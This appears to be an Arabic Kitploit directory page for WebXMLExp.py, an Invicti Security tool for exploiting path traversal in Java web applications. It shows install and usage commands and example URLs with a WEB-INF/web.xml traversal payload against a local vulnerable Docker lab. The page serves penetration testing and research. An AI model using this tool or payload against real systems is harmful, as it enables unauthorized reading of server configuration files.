Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/invicti-security/web-inf-path-trav
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتسريب البياناتأمن الويباختبار الاختراق
GitHubinvicti-security/web-inf-path-trav

web-inf-path-trav

أداة للمساعدة في استغلال ثغرات اجتياز المسار (Path Traversal) في تطبيقات الويب المكتوبة بلغة جافا.

عرض المستودع
3355منذ 3 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

WebXMLExp.py

أداة للمساعدة في استغلال ثغرات اجتياز المسار (Path Traversal) في تطبيقات الويب بلغة Java.

تمت الإشارة إلى هذه الأداة في الورقة التقنية الصادرة عن Invicti Security استغلال ثغرات اجتياز المسار في تطبيقات الويب بلغة Java.

التثبيت

يتطلب تشغيل هذه الأداة توفّر Python3.

قم بتشغيل الأمر التالي:

root@kitploit:~
pip install -r requirements.txt

الاستخدام:

بعد التثبيت، قم بتقديم رابط استغلال (URL) كما يلي:

root@kitploit:~
usage: python WebXMLExp.py <url_with_web_xml_exploit_or_inject_here_marker>

تتوفر النتائج (الملفات التي تم تنزيلها) في مجلد results.

أمثلة

root@kitploit:~
python WebXMLExp.py "http://127.0.0.1:8082/vulnerable/download.servlet?filename=WEB-INF/web.xml"
python WebXMLExp.py "http://127.0.0.1:8082/vulnerable/download.servlet?filename=<INJECT-HERE>"

صورة Docker لتطبيق ويب قابل للاستغلال

يتم توفير تطبيق ويب قابل للاستغلال بثغرة اجتياز المسار في مجلد docker.

للبدء، ادخل إلى مجلد docker ثم شغّل:

root@kitploit:~
docker-compose up

يمكن الوصول إلى التطبيق عبر الرابط http://127.0.0.1:8082/vulnerable/.

لاستغلال ثغرة اجتياز المسار، قم بزيارة: http://127.0.0.1:8082/vulnerable/download.servlet?filename=WEB-INF/web.xml

تنزيل الأداة